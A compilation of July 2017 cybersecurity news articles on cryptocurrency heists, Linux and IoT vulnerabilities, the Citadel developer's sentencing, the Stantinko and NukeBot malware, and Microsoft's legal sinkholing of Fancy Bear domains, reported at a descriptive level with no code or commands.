This week, an unknown hacker stole nearly $32 Million worth of Ethereum – one of the most popular and increasingly valuable cryptocurrencies – from wallet accounts linked to at least three companies by exploiting a critical vulnerability in Parity's Ethereum Wallet software.
This was the third Ethereum cryptocurrency heist that came out two days after an alleged hacker stole $7.4 Million worth of Ether from trading platform CoinDash and two weeks after someone hacked into South Korean cryptocurrency exchange and stole more than $1 Million in Ether and Bitcoins from user accounts.
For more detailed information about the Ethereum Heist — Read More.
5. Critical Gnome Flaw Leaves Linux PCs Vulnerable
This week has been bad for Linux users as well. A security researcher discovered a code injection vulnerability in the thumbnail handler component of GNOME Files file manager that allowed hackers to execute malicious code on targeted Linux machines.
German researcher Nils Dagsson Moskopp dubbed the vulnerability Bad Taste (CVE-2017-11421) and also released proof-of-concept (PoC) code on his blog to demonstrate the vulnerability.
For more details about the Bad Taste vulnerability and its PoC — Read More.
6. New Malware Exploits SambaCry to Hijack NAS Devices

Despite being patched in late May, the SambaCry vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances.
SambaCry is a 7-year-old critical remote code execution (RCE) vulnerability (CVE-2017-7494) in Samba networking software that could allow a hacker to remotely take full control of a vulnerable Linux and Unix machines.
The flaw was discovered and patched two months ago, but researchers at Trend Micro warned that the flaw had been actively exploited by the SHELLBIND malware that mostly targets NAS devices used by small and medium-size businesses.
For more detailed information on the SHELLBIND malware — Read More.
7. Devil's Ivy — Millions of Internet-Connected Devices At Risk
This week, researchers at the IoT-focused security firm Senrio discovered a critical remotely exploitable vulnerability in an open-source software development library used by major IoT manufacturers that eventually left millions of smart devices vulnerable to hacking.
Dubbed Devil's Ivy, the vulnerability (CVE-2017-9765) in the gSOAP toolkit (Simple Object Access Protocol) — an advanced C/C++ auto-coding tool for developing XML Web services and XML application.
The researchers also released proof-of-concept (PoC) video demonstrating the RCE on a security camera manufactured by Axis Communications.
For more detailed information on the Devil's Ivy and PoC video — Read More.
8. “Ubuntu Linux for Windows 10 Released” — Sounds So Weird?
Downloading an entire operating system has just become as easy as downloading an application for Windows 10 users, as Microsoft last week announced the availability of popular Linux distro 'Ubuntu' in the Windows App Store.
While the company announced its plans to launch Fedora and SUSE Linux as well on Windows Store, the company did not reveal exactly when its users can expect to see these two flavours of Linux distro on the App Store.
For detailed information on how to install and run Ubuntu on Windows 10 — Read More.
9. Over 70,000 Memcached Servers Vulnerable to Hacking

It's been almost eight months since the Memcached developers have patched several critical remote code execution (RCE) vulnerabilities in the software, but tens of thousands of servers running Memcached application are still vulnerable.
Cisco's Talos intelligence and research group last year discovered three critical RCE vulnerabilities in Memcached — a moderhttp://thehackernews.com/2017/07/segway-hoverboard-hacking.htmln open-source and easily deployable distributed caching system that allows objects to be stored in memory.
The vulnerability exposed major websites including Facebook, Twitter, YouTube, Reddit, to hackers, but the team of researchers scanned the internet on two different occasions and found that over 70,000 servers are still vulnerable to the attacks, including ransomware attacks similar to the one that hit MongoDB databases in late December.
For more in-depth information on the Memcached vulnerabilities — Read More.
10. Tor Launches Bug Bounty Program for Public
After its intention to launch a public bug bounty program in late December 2015, the Tor Project has finally launched a "Bug Bounty Program," encouraging hackers and security researchers to find and privately report bugs that could compromise the anonymity network.
The bug bounty reports will be sent through HackerOne — a startup that operates bug bounty programs for companies including Yahoo, Twitter, Slack, Dropbox, Uber, General Motors – and even the U.S. Department of Defense for Hack the Pentagon initiative.
For detailed information on bug bounty prices and types of valid vulnerabilities — Read More.
Other Important News This Week
Besides these, there were lots of incidents happened this week, including:
Microsoft's smart move to help take down cyber espionage campaigns conducted by "Fancy Bear" hacking group.
A new credential stealing malware found being sold for as cheap as $7 on underground forums.
Cisco patched a highly critical RCE vulnerability in its WebEx browser extension for Chrome and Firefox, which could allow attackers to execute malicious code on a victim's computer remotely.
Windows 10 now let you Reset forgotten password directly from your computer's Lock Screen.
Several critical vulnerabilities in Segway Ninebot miniPRO could allow hackers to remotely take "full control" over the hoverboard within range and leave riders out-of-control.
Ashley Madison's parent company Ruby Corp has agreed to pay a total of $11.2 Million to roughly 37 million users whose personal details were exposed in a massive data breach two years ago.


A Russian man involved in the development and maintenance of Citadel was sentenced to five years in prison
23.7.2017 securityaffairs  BigBrothers
The Russian hacker Mark Vartanyan was sentenced to five years in prison for his involvement in the development and maintenance of the Citadel botnets.
It’s a terrific moment for cyber criminals, law enforcement worldwide continues their fight against illegal activities online and the recent shut down of AlphaBay and Hansa black markets demonstrate it.

The news of the day is that the Russian hacker Mark Vartanyan was sentenced to five years in prison for his involvement in the development and maintenance of the Citadel botnets.

Vartanyan, also known with the pseudonymous of “Kolypto” was arrested in Norway and extradited to the United States in December 2016.

Kolypto pleaded guilty in court in March 2017, he was charged with one count of computer fraud.

“Citadel caused vast amounts of harm to financial institutions and individuals around the world. Mark Vartanyan utilized his technical expertise to enable Citadel into becoming one of the most pernicious malware toolkits of its time, and for that, he will serve significant time in federal prison,” said US Attorney John Horn.

Citadel started being offered for sale in 2011 on invite-only, Russian cybercriminal forums, it is directly derived from the popular Zeus banking Trojan, in June 2013 Microsoft and the FBI carried out takedowns that eradicated more than 1,400 bots (nearly 88% of overall Citadel botnet) associated with this malware.

citadel panel

Experts estimated that the malware has been responsible for over $500 million in financial fraud.

Across the years, the Citadel malware affected more than 11 million computers globally, the most recent variant derived by Citadel is Atmos and it was spotted in April 2016 when he infected more than 1,000 bots.

The Vartanyan’s role was crucial for the malware distribution, the man was involved in the development and improving maintenance of Citadel. He was active from August 21, 2012 and January 9, 2013, while residing in Ukraine, and between on or about April 9, 2014 and June 2, 2014, while residing in Norway.

“Malicious software and botnets are rarely created by a single individual. Cybercrime is an organized team effort involving sophisticated, talented, and tech savvy individuals. Today’s sentencing of Mr. Vartanyan […] both removes a key resource from the cyber underworld and serves as a strong deterrent to others who may be contributing to the development of botnets and malware. The threat posed by cyber criminals in the U.S. and abroad is ever increasing,” David J. LeValley, Special Agent in Charge, FBI Atlanta Field Office, said.


Lloyd’s of London: A massive cyber attack could cause an average of $53 billion of economic losses
23.7.2017 securityaffairs 
Ransomware

A major global cyber attack has the potential to trigger $53 billion of economic losses, the equivalent to a natural disaster like 2012’s Superstorm Sandy.
Events like the massive Wannacry attack or the Ukraine power outage raise the discussion about the possible economic losses caused by a cyber attack.

According to a new report published by the Lloyd’s of London (“Counting the cost: Cyber exposure decoded”), a massive cyber attack on a global scale could cause an average of $53 billion of economic losses. a figure on par with a catastrophic natural disaster such as U.S. Superstorm Sandy in 2012, Lloyd’s of London said in a report on Monday.

“A major global cyber-attack has the potential to trigger $53 billion of economic losses, roughly the equivalent to a catastrophic natural disaster like 2012’s Superstorm Sandy, according to a scenario described in new research by Lloyd’s, the world’s specialist insurance market, and Cyence, a leading cyber risk analytics modelling firm.” states a blog post published by Lloyd’s of London.

The figure is disconcerting, experts compared it with losses caused by a natural disaster such as the Superstorm Sandy that hit the US in 2012.

“The report, co-written with risk-modeling firm Cyence, examined potential economic losses from the hypothetical hacking of a cloud service provider and cyber attacks on computer operating systems run by businesses worldwide.” reported the Reuters.

Insurers are trying to estimate the economic impact of a cyber attack and the potential exposure to cyber risks, and believe me, it is very difficult to do it due to the lack of historical data on such kind of incidents.

“This report gives a real sense of the scale of damage a cyber-attack could cause the global economy. Just like some of the worst natural catastrophes, cyber events can cause a severe impact on businesses and economies, trigger multiple claims and dramatically increase insurers’ claims costs. Underwriters need to consider cyber cover in this way and ensure that premium calculations keep pace with the cyber threat reality.” said Lloyd’s of London Chief Executive Inga Beale.

“We have provided these scenarios to help insurers gain a better understanding of their cyber risk exposures so they can improve their portfolio exposure management and risk pricing, set appropriate limits and expand into this fast-growing, innovative insurance class with confidence.”

According to Cyence, economic costs in the hypothetical cloud provider attack could reach $8 billion global cost for cases like “WannaCry” ransomware that hit targets in more than 100 countries.

cyber attack WannaCrypt ransomware

Economic costs could include business interruptions and computer repairs.

In June, the “NotPetya” ransomware infected systems worldwide causing $850 million in economic costs.

According to the report, in the hypothetical cloud service attack, hackers delivered a malware into a cloud provider’s software that was designed to trigger system crashes among users a year later.

The malware then propagates among the provider’s customers, infecting systems in almost any industry, from financial services to healthcare

The experts estimated average economic losses caused by the disruption of the victims’ operations could range from $4.6 billion to $53 billion for massive cyber attacks.

“But actual losses could be as high as $121 billion, the report said.” continues the Reuters.

“As much as $45 billion of that sum may not be covered by cyber policies due to companies underinsuring, the report said.”

The report estimates average losses for a scenario involving a hacking of operating systems ranged from $9.7 billion to $28.7 billion.

“Lloyd’s has a 20 percent to 25 percent share of the $2.5 billion cyber insurance market,” added Beale.

Download ‘Counting the cost: Cyber exposure decoded‘ report


Russia’s Duma has approved the bill to prohibit tools used to surf outlawed websites
23.7.2017 securityaffairs  BigBrothers

Russia is going to tighten controls on web services, on Friday, the parliament voted to prohibit web tools that could be used to surf outlawed websites.
Recently Russian authorities threatened to ban to ban Telegram because it refused to comply data protection laws.

On Friday, the Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites.


In the same day, the Duma also approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

Russia is going to tighten controls on web services, for this reason, members the Duma passed the questionable bill. The bill will prohibit the use of any service from the Russian territory if they could be used to access blacklisted websites.

In case the law will be approved by the upper chamber of the Russian Parliament and by President Vladimir Putin, the Roskomnadzor will manage a list of anonymizer services and will ban them if they will be not compliant with access restrictions ordered by the Russian Government.

Privacy advocates groups fear the bill that is considered too restrictive and could open the door to a strict censorship, Government opposition groups heavily rely on such kind of technology to extend their protest abroad.

Let me close with a look at the Tor Metrics and Russia people accessing the popular anonymizing service.

Duma on outlawed websites Tor metrics

The data related to the top-10 countries by estimated number of directly-connecting clients shows that Russia is at the third place.

COUNTRY MEAN DAILY USERS
United States 437521 (20.01 %)
United Arab Emirates 320743 (14.67 %)
Russia 213318 (9.76 %)
Ukraine 180847 (8.27 %)
Germany 176053 (8.05 %)
France 87925 (4.02 %)
United Kingdom 75001 (3.43 %)
Canada 41001 (1.88 %)
Netherlands 40586 (1.86 %)
Italy 37230 (1.70 %)


Stantinko botnet was undetected for at least 5 years while infecting half a million systems
23.7.2017 securityaffairs 
BotNet

A huge botnet dubbed Stantinko was undetected for at least 5 years, the disconcerting discovery was made by researchers from security firm ESET.
According to ESET, the Stantinko botnet has infected around half a million computers worldwide. Operators behind the botnet powered a massive adware campaign active since 2012, crooks mainly targeted users in Russia and Ukraine searching for pirated software.

The researchers discovered that the attack vector used by the cyber criminals is an app called FileTour, it is used to install a variety of programs on the victim’s machine, while also launching Stantinko in the background.

“Making heavy use of code encryption and rapidly adapting so as to avoid detection by anti-malware, Stantinko’s operators managed to stay under the radar for at least the last five years, attracting very little attention to their operations.” states the analysis published by ESET.

The botnet is mainly used to install on the infected systems browser extensions that are used to inject ad and perform click fraud.

The malicious browser extensions installed by the Stantinko malware are called The Safe Surfing and Teddy Protection. Both extensions distributed through the Chrome Web Store are used to block unwanted URLs. The botnet installs its versions of both browser extensions that are able to receive a configuration to perform click fraud and ad injection.

The researchers also noticed that the Stantinko malware could be used take full control of the target systems, it leverages on services that allow attackers conduct several malicious activities (i.e. performing massive searches on Google, performing brute-force attacks on Joomla and WordPress installs).

The malware installs two specific Windows services after compromise, each of them is able to reinstall the other if deleted. This means that in order to sanitize the system it is necessary to remove both services at the same time.

Stantinko botnet

The Stantinko malware is a modular backdoor, its components embed a loader allowing them to execute any Windows executable sent by the C&C server directly in memory.

“This feature is used as a very flexible plugin system allowing the operators to execute anything on an infected system. Table 1 is a description of known Stantinko plugins.

MODULE NAME ANALYSIS
Brute-force Distributed dictionary-based attack on Joomla and WordPress administrative panels.
Search Parser Performs massive distributed and anonymous searches on Google to find Joomla and WordPress websites. It uses compromised Joomla websites as C&C servers.
Remote Administrator Backdoor that implements a full-range of actions from reconnaissance to data exfiltration.
Facebook Bot Bot performing fraud on Facebook. Its capabilities include creating accounts, liking picture or pages, and adding friends.
Experts speculate that crooks work close to the advertisers that pay for the traffic they receive from the botnet.

“On the other hand, traditional click-fraud malware relies on a series of redirections between several ad networks to launder their malicious traffic. This shows that not only are the Stantinko operators able to develop highly stealthy malware, but they are also able to abuse the traditional ad-serving economy without getting caught,” ESET points out.


Microsoft sued Fancy Bear to gain control of the domains used in the cyber espionage campaigns
22.7.2017 securityaffairs
APT

Microsoft used the lawsuit to disrupt a large number of cyber espionage campaigns conducted by infamous Fancy Bear APT hacking group
We have discussed several times about hacking back and the case we are going to analyze is a good example of an alternative approach to hit back an APT group.
Microsoft used the lawsuit to disrupt a large number of cyber espionage campaigns conducted by infamous Fancy Bear APT hacking group (APT28, Sofacy, Sednit, and Pawn Storm). The experts with the help of the authorities took over the command and control infrastructure of the group in order to analyze the traffic and the targets of the malware by using the lawsuit as a tool.

“A new offensive by Microsoft has been making inroads against the Russian government hackers behind last year’s election meddling, identifying over 120 new targets of the Kremlin’s cyber spying, and control-alt-deleting segments of Putin’s hacking apparatus.” reported the daily beast.

“How are they doing it? It turns out Microsoft has something even more formidable than Moscow’s malware: Lawyers.”
Microsoft sued Fancy Bear in a US federal court, accusing the APT group of computer intrusion, cybersquatting, and reserving several domain names that violate Microsoft’s trademarks.
Fancy Bear is active since at least 2007 and was one of the APT groups involved in the numerous cyber attacks against the US DNC and 2016 Presidential Election.

Numerous reports published by security firms linked the APT group to the GRU (General Staff Main Intelligence Directorate), the Russian secret military intelligence agency.
The experts at Microsoft observed Fancy Bear hackers often using domain names that look-alike Microsoft products and services, such as livemicrosoft[.]net and rsshotmail[.]com, for its cyber espionage campaigns.

The abuse was exploited by Microsoft to sue the hacking group with “unknown members” into the court of justice and gain the ownership of domains used by Fancy Bear to deliver malware.

“These servers can be thought of as the spymasters in Russia’s cyber espionage, waiting patiently for contact from their malware agents in the field, then issuing encrypted instructions and accepting stolen documents,” the report reads.

Fancy bear

Last year, the U.S. District Judge Gerald Bruce Lee granted Microsoft’s request and issued a then-sealed order to domain name registrars “compelling them to alter”the DNS of at least 70 Fancy Bear domains. The traffic was redirected to servers controlled by Microsoft.
Technically the procedure is called ‘sinkholing‘ and allows investigators to monitor the traffic from the infected systems to track the botnet infrastructure.

This is the precious work done by the Digital Crimes Unit that has identified the potential victims of the Russian APT.
“By analyzing the traffic coming to its sinkhole, the company’s security experts have identified 122 new cyber espionage victims, whom it’s been alerting through Internet service providers,” the report reads.

Microsoft is still waiting for a final judgment on the Fancy Bear case. The hearing has been scheduled on Friday in Virginia court.

“Microsoft concludes in court filings that its efforts have had “significant impact” on Fancy Bear’s operations. By analyzing the traffic coming to its sinkhole, the company’s security experts have identified 122 new cyber espionage victims, whom it’s been alerting through Internet service providers.” concludes the report.”On Friday, the company is set to ask Magistrate Judge Theresa Carroll Buchanan for a final default judgment against Fancy Bear, and for a permanent injunction giving Microsoft ownership of the domains it’s seized.”


Modified versions of Nukebot Trojan spotted in wild after code leak
22.7.2017 securityaffairs
Virus

Apparently, different cyber gangs are using modified versions of the Nukebot in wild after code Leak occurred in March 2017.
Crooks are adapting the leaked source code for the Nukebot banking Trojan to target banks in the United States and France and to steal mail client and browser passwords.

Apparently, different cyber gangs are using modified versions of the Nukebot in wild since its source code was leaked leak in March.

Nuclear Bot Banking

In March, the source code for a new banking Trojan, dubbed Nuclear Bot (Nukebot ), was available for sale in the cyber criminal underground.The Nuclear Bot banking Trojan first appeared in the cybercrime forums in early December when it was offered for $2,500. The malicious code implements some features commonly seen in banking Trojans, it is able to inject code in Mozilla Firefox, Internet Explorer and Google Chrome browsers and steal sensitive data provided by the users.

The Trojan can also open a local proxy or hidden remote desktop service to allow crooks to initiate rogue transactions through the victims’ browsers after they have been tricked into providing the second authentication factor.

The creator of the malware lost his credibility over the months and has been flagged as a scammer in the hacking community. The malware author did not offer a test version of the malware to potential buyers and advertised the Nuclear Bot using different names on different cybercrime forums.

In order to gain credibility and notoriety in the cyber crime underground he released the Trojan’s source code.

The NukeBot Trojan appears as a powerful tool written from scratch and that was able in early stage attacks to avoid detection of antivirus solutions.

Now malware experts from Kaspersky Lab have detected several compiled samples of Nukebot Trojan created since March, many of which appear to be test samples.

“The publication of malware source code may be nothing new, but it still attracts attention from across the IT community and some of that attention usually goes beyond just inspecting the code. The NukeBot case was no exception: we managed to get our hands on a number of compiled samples of the Trojan. ” wrote experts from Kaspersky.

“Most of them were of no interest, as they stated local subnet addresses or ‘localhost/127.0.0.1’ as the C&C address. Far fewer samples had ‘genuine’ addresses and were ‘operational.’”

The analysis of compiled samples revealed that only five percent were being used in real attacks, but there is no information about the campaign leveraging these samples.

The implementations of web injections in the source code confirm that hackers are using it to target banks in France and the U.S.

Researchers extracted the IP addresses of the command and control servers from the code from some plait-text version they were in possession. Obviously, the operational versions of Nukebot were encrypted, this means that the researchers need to extract the keys in order to decode it.

“In order to trigger web injections, we had to imitate interaction with C&C servers. The C&C addresses can be obtained from the string initialization procedure,” continues the analysis. “When first contacting a C&C, the bot is sent an RC4 key which it uses to decrypt injections. We used this simple logic when implementing an imitation bot, and managed to collect web injections from a large number of servers.

“Initially, the majority of botnets only received test injects that were of no interest to us,” Yunakovsky said. Later, however, we identified a number of NukeBot’s ‘combat versions.’”

Experts also noticed that some modified versions of Nukebot did not have web injections, these variants are delivered via droppers, and once they are unpacked, the malicious code downloads a number of password recovery utilities from a remote server under the attacker’s control.


Dark Web Users Suspect "Dream Market" Has Also Been Backdoored by Feds

22.7.2017 thehackernews  CyberCrime

By now you might be aware of the took down of two of the largest online dark websites—AlphaBay and Hansa—in what's being called the largest-ever international operation against the dark web's black market conducted by the FBI, DEA (Drug Enforcement Agency) and Dutch National Police.
But the interesting aspect of the takedown was that the federal authorities shut down AlphaBay, but took control of the Hansa market and kept it running for at least a month in an effort to monitor the activities of its visitors.
The visitors of Hansa market also included a massive flood of Alphabay refugees, as the seizer of AlphaBay Market forced their visitors to join the Hansa market for illegal trading and purchasing.
However, not just Hansa, after AlphaBay's shutdown, many of its users also joined another website known as Dream Market, which is believed to be the second-largest dark web marketplace, ahead of Hansa.
After the shutdown of both AlphaBay and Hansa, Dream Market has emerged as the leading player, but now some Reddit users on several "r/Dream_Market" threads have expressed concerns about the Dream Market, which has been in business since 2013.
One Reddit user said that Dream Market has been compromised in a similar manner as Hansa and is already under police control.
"I got contacted by an ex-Hansa staff member telling me that the operation is apparently bigger than we currently assume, that 'there will be a bloodbath, a purge' and that 'any vendor on HANSA should immediately seize his operation, lawyer up and hide his trails'," the Reddit user post read.
Possibly the Real IP of Dream Market "Mistakenly" Exposed

Another Redditor claimed to have discovered a non-encrypted IP address in Dream Market’s source code, saying that police might have taken over control of the dark market as well and are now actively monitoring its visitors.
"We found a clear address IP on the javascript source code of the market. The police must know it from a long time. GO AWAY FROM HERE RIGHT NOW !!!," the Redditor wrote along with a piece of Site's Source Code.
After exploring a bit, I found that the clearnet IP address 194.9.94.82 mentioned in the JavaScript file (lchudifyeqm4ldjj.onion/market.js) is owned by "Loopia AB," a Swedish hosting company.
This JavaScript file has not been added or altered recently, as according to some moderators, the file has been there from at least past 9 months, and the code itself doesn’t indicate any signs of hijack or interception.
However, here's the big blunder — Exposure of the possible real IP address of the server, which is supposed to be hidden behind the Tor Onion Router, is one of the biggest mistakes Dream Market operators might have made that could have already given an opportunity to law enforcement agencies to raid the hosting company and take control of the servers.
While the claims that Dream Market is under police control are yet to be verified, vendors who joined Dream Market may still be compromised by law enforcement.
Meanwhile, some anonymous users on Reddit are also encouraging dark web users to visit Dream Market, saying "CALM DOWN! DREAM IS WORKING FINE!"
Benefitted from the shutdown of its rivals, Dream Market had 57,000 listings for drugs and 4,000 listings for opioids on Thursday.


How Microsoft Cleverly Cracks Down On "Fancy Bear" Hacking Group

22.7.2017 thehackernews  CyberSpy

What could be the best way to take over and disrupt cyber espionage campaigns?
Hacking them back?
Probably not. At least not when it's Microsoft, who is continuously trying to protect its users from hackers, cyber criminals and state-sponsored groups.
It has now been revealed that Microsoft has taken a different approach to disrupt a large number of cyber espionage campaigns conducted by "Fancy Bear" hacking group by using the lawsuit as a tool — the tech company cleverly hijacked some of its servers with the help of law.
Microsoft used its legal team last year to sue Fancy Bear in a federal court outside Washington DC, accusing the hacking group of computer intrusion, cybersquatting, and reserving several domain names that violate Microsoft's trademarks, according to a detailed report published by the Daily Beast.
Fancy Bear — also known as APT28, Sofacy, Sednit, and Pawn Storm — is a sophisticated hacking group that has been in operation since at least 2007 and has also been accused of hacking the Democratic National Committee (DNC) and Clinton Campaign in an attempt to influence the U.S. presidential election.
The hacking group is believed to be associated with the GRU (General Staff Main Intelligence Directorate), Russian secret military intelligence agency, though Microsoft has not mentioned any connection between Fancy Bear and the Russian government in its lawsuit.
Instead of registering generic domains for its cyber espionage operations, Fancy Bear often picked domain names that look-alike Microsoft products and services, such as livemicrosoft[.]net and rsshotmail[.]com, in order to carry out its hacking and cyber espionage campaigns.
This inadvertently gave Microsoft an opportunity to drag the hacking group with "unknown members" into the court of justice.
Microsoft Sinkholed Fancy Bear Domains
The purpose of the lawsuit was not to bring the criminal group to the court; instead, Microsoft appealed to the court to gain the ownership of Fancy Bear domains — many of which act as command-and-control servers for various malware distributed by the group.
"These servers can be thought of as the spymasters in Russia's cyber espionage, waiting patiently for contact from their malware agents in the field, then issuing encrypted instructions and accepting stolen documents," the report reads.
Although Microsoft did not get the full-ownership of those domains yet, the judge last year issued a then-sealed order to domain name registrars "compelling them to alter" the DNS of at least 70 Fancy Bear domains and pointing them to Microsoft-controlled servers.
Eventually, Microsoft used the lawsuit as a tool to create sinkhole domains, allowing the company's Digital Crimes Unit to actively monitor the malware infrastructures and identify potential victims.
"By analyzing the traffic coming to its sinkhole, the company’s security experts have identified 122 new cyber espionage victims, whom it’s been alerting through Internet service providers," the report reads.
Microsoft has appealed and is still waiting for a final default judgment against Fancy Bear, for which the hearing has been scheduled on Friday in Virginia court.


Russia Moves to Ban Tools Used to Surf Outlawed Websites

22.7.2017 securityweek BigBrothers

Russia's parliament on Friday voted to outlaw web tools that allow internet users to sidestep official bans of certain websites, the nation's latest effort to tighten controls of online services.

Members of the lower house, the Duma, passed the bill to prohibit the services from Russian territory if they were used to access blacklisted sites.

The bill instructs Russia's telecommunications watchdog Roskomnadzor to compile a list of anonymizer services and prohibit any that fail to respect the bans issued in Russia on certain websites.

The proposed law still has to be approved by the upper chamber of parliament and then by President Vladimir Putin.

Several internet-based groups in Russia have condemned it as too vaguely formulated and too restrictive.

The Duma also approved moves Friday to oblige anyone using an online message service to identify themselves with a telephone number.

Russia's opposition groups rely heavily on the internet to make up for their lack of access to the mainstream media.

But the Russian authorities have begun to tighten controls on online services, citing security concerns.

In June, Russian officials threatened to ban the Telegram messaging app after the FSB security service said those behind April's deadly Saint Petersburg metro bombing had used it.


Citadel Author Sentenced to Five Years in Prison

22.7.2017 securityweek Virus

A Russian man this week was sentenced to five years in prison for his involvement in the development and maintenance of the Citadel banking malware.

Known under the handle of “Kolypto,” Mark Vartanyan was arrested in Norway and extradited to the United States in December 2016. In March 2017, he pleaded guilty in court. Charged with one count of computer fraud, he will serve his sentence in federal prison.

The Citadel malware was designed to steal sensitive information such as online banking login credentials, courtesy of keylogging capabilities. The threat ensnared machines into botnets and affected millions of people globally. The malware was estimated in 2013 to have been responsible for over $500 million in financial fraud.

Based on the leaked source code of the Zeus banking Trojan, Citadel spawned numerous variants, the most recent of which is called Atmos and is said to be Citadel's polymorphic successor. In April last year, Atmos had over 1,000 bots.

“Citadel caused vast amounts of harm to financial institutions and individuals around the world. Mark Vartanyan utilized his technical expertise to enable Citadel into becoming one of the most pernicious malware toolkits of its time, and for that, he will serve significant time in federal prison,” U.S. Attorney John Horn said.

Also capable of stealing personally identifiable information from victim computer networks, Citadel started being sold in 2011 on invite-only, Russian-language cybercriminal forums.

Citadel operators are said to have targeted and exploited the computer networks of major financial and government institutions worldwide, including financial institutions in the United States. The malware infected an estimated 11 million computers.

According to the information presented in court, Vartanyan was involved not only in the development and maintenance of Citadel, but also in the improvement and distribution of the malware. He engaged in such activities between on or about August 21, 2012 and January 9, 2013, while residing in Ukraine, and between on or about April 9, 2014 and June 2, 2014, while residing in Norway, the Department of Justice reveals.

“Malicious software and botnets are rarely created by a single individual. Cybercrime is an organized team effort involving sophisticated, talented, and tech savvy individuals. Today's sentencing of Mr. Vartanyan […] both removes a key resource from the cyber underworld and serves as a strong deterrent to others who may be contributing to the development of botnets and malware. The threat posed by cyber criminals in the U.S. and abroad is ever increasing,” David J. LeValley, Special Agent in Charge, FBI Atlanta Field Office, said.


Symantec Tricked Into Revoking Certificates Using Fake Keys

22.7.2017 securityweek Security

Researcher Hanno Böck has tricked Symantec into revoking TLS certificates by falsely claiming that their private keys had been compromised. Comodo was also targeted, but the company did not fall for the same ruse.

Certificate authorities (CAs) are required to revoke certificates whose private keys have been compromised within 24 hours. Keys are often inadvertently exposed by certificate owners and previous research by Böck showed that while it often takes companies more than 24 hours, ultimately they do revoke compromised certificates.

Böck then decided to check if CAs ensure that an allegedly compromised private key actually belongs to a certificate before revoking it.

The researcher set up a couple of test domains and ordered free, short-term certificates for them from Comodo and Symantec’s RapidSSL. He then created fake private keys for the certificates and attempted to trick Symantec and Comodo into revoking them by providing the forged keys.

In order to increase his chances of success, Böck searched the web for private keys that were actually compromised and added them to a Pastebin post along with his forged keys. He then informed Comodo and Symantec about the “compromised” keys and asked them to revoke the certificates.

While Comodo did notice the fake keys among the ones that were actually compromised, Symantec informed him that all the certificates whose private keys were in the Pastebin post, including the fake ones apparently associated with the researcher’s test domains, had been revoked.

“No harm was done here, because the certificate was only issued for my own test domain. But I could’ve also fake private keys of other people's' certificates. Very likely Symantec would have revoked them as well, causing downtimes for those sites” Böck explained.

The researcher was also displeased with the fact that Symantec did not provide a reason for revoking the certificates, which makes it difficult for domain owners to learn from mistakes and improve their processes. Symantec insisted that the keys associated with Böck’s certificates had been compromised, even after he pointed out that the certificates had actually been revoked based on forged keys.

“Symantec did a major blunder by revoking a certificate based on completely forged evidence. There’s hardly any excuse for this and it indicates that they operate a certificate authority without a proper understanding of the cryptographic background,” Böck said.

After the researcher made his findings public, Symantec published a blog post promising to improve its processing of third-party revocation requests.

“First, a gap was identified in the public and private key matching process where keys are verified during the revocation request procedure,” Symantec said. “We performed a modulus comparison, a necessary part of this verification process, but it was incomplete as other parameters in the keys were not checked. Once we became aware of this, we immediately corrected the procedure. We are not aware of any instances where there was customer impact as a result of this process gap other than the test scenario run by the reporting researcher.”

“Secondly, we are reviewing how we communicate with customers during the 3rd party revocation request process to be more consistent and transparent with certificate owners,” it added.

Google and Mozilla are both displeased with Symantec, its subsidiaries and its partners regarding the improper issuance of certificates. There has been a lot of debate over the past few months about how Symantec should be penalized, with the security firm making another counterproposal this week.


Undetected For Years, Stantinko Malware Infected Half a Million Systems

22.7.2017 securityweek Virus

A massive botnet that remained under the radar for the past five years managed to infect around half a million computers and allows operators to “execute anything on the infected host,” ESET researchers warn.

Dubbed Stantinko, the botnet has powered a massive adware campaign active since 2012, mainly targeting Russia and Ukraine, but remained hidden courtesy of code encryption and the ability to rapidly adapt to avoid detection by anti-malware solutions.

Targeting users looking for pirated software, the actors behind the malware use an app called FileTour as the initial infection vector. The program installs a variety of programs on the victim’s machine, while also launching Stantinko in the background.

The massive botnet is used mainly to install browser extensions that in turn perform ad injections and click fraud, but malicious Windows services are used to execute a broad range of operations: backdoor activities, searches on Google, and brute-force attacks on Joomla and WordPress administrator panels, ESET reveals.

The threat also installs two malicious Windows services after compromise, each with the ability to reinstall the other if deleted. Because of this, successful disinfection requires both services to be deleted at the same time. If not, a new version of the deleted service could be provided by the command and control (C&C) server, researchers say.

The malicious browser extensions installed by Stantinko are called The Safe Surfing and Teddy Protection, both distributed through the Chrome Web Store and seemingly legitimate apps that block unwanted URLs. When installed by the botnet, however, the extensions receive a configuration to perform click fraud and ad injection.

Stantinko is a modular backdoor that includes a loader to execute any Windows executable sent by the C&C server directly in memory. Courtesy of a flexible plugin system, the malware’s operators can execute any code on an infected system.

Known plugins include Brute-force (performs distributed dictionary-based attacks on Joomla and WordPress administrative panels), Search Parser (performs massive distributed and anonymous searches on Google to find Joomla and WordPress websites and uses compromised Joomla websites as C&C servers), Remote Administrator (backdoor that implements a full-range of actions, from reconnaissance to data exfiltration), and Facebook Bot (performs fraud on Facebook: can create accounts, like pictures or pages, and add friends).

The malware’s operators are focused on making money mainly through click fraud. The actors are also believed to be very close to the advertisers, as users would sometimes reach the advertiser’s website directly after the Stantinko-owned ad network.

“On the other hand, traditional click-fraud malware relies on a series of redirections between several ad networks to launder their malicious traffic. This shows that not only are the Stantinko operators able to develop highly stealthy malware, but they are also able to abuse the traditional ad-serving economy without getting caught,” ESET points out.

The group behind the botnet is also trying to fraudulently access administrative accounts of Joomla and WordPress websites and resell the account logins on the underground market. Furthermore, the actors also engage into social network fraud through a plugin capable of interacting with Facebook (courtesy of botnet’s size, it is difficult for Facebook to detect this type of fraud).

“Even though it isn’t noticeable to the user, due to the absence of CPU intensive tasks, Stantinko is a major threat, as it provides a large source of fraudulent revenue to cybercriminals. Moreover, the presence of a fully featured backdoor allows the operators to spy on all the victimized machines,” the security researchers conclude.


Network Spreading Capabilities Added to Emotet Trojan

22.7.2017 securityweek Virus

Researchers at Fidelis Cybersecurity have spotted a variant of the Emotet Trojan that has what appears to be a feature designed to help the malware spread on internal networks.

The recent WannaCry and NotPetya incidents have demonstrated how efficient an attack can be if the malware includes a component that allows it to spread from one system to another. Given the success of these operations, other cybercriminals may also be looking to incorporate similar capabilities into their malware.

Emotet, also known as Geodo, is related to the Dridex and Feodo (Cridex, Bugat) malware families. Emotet has mainly served as a banking Trojan, helping cybercriminals steal banking credentials and other sensitive information from users in Europe and the United States.

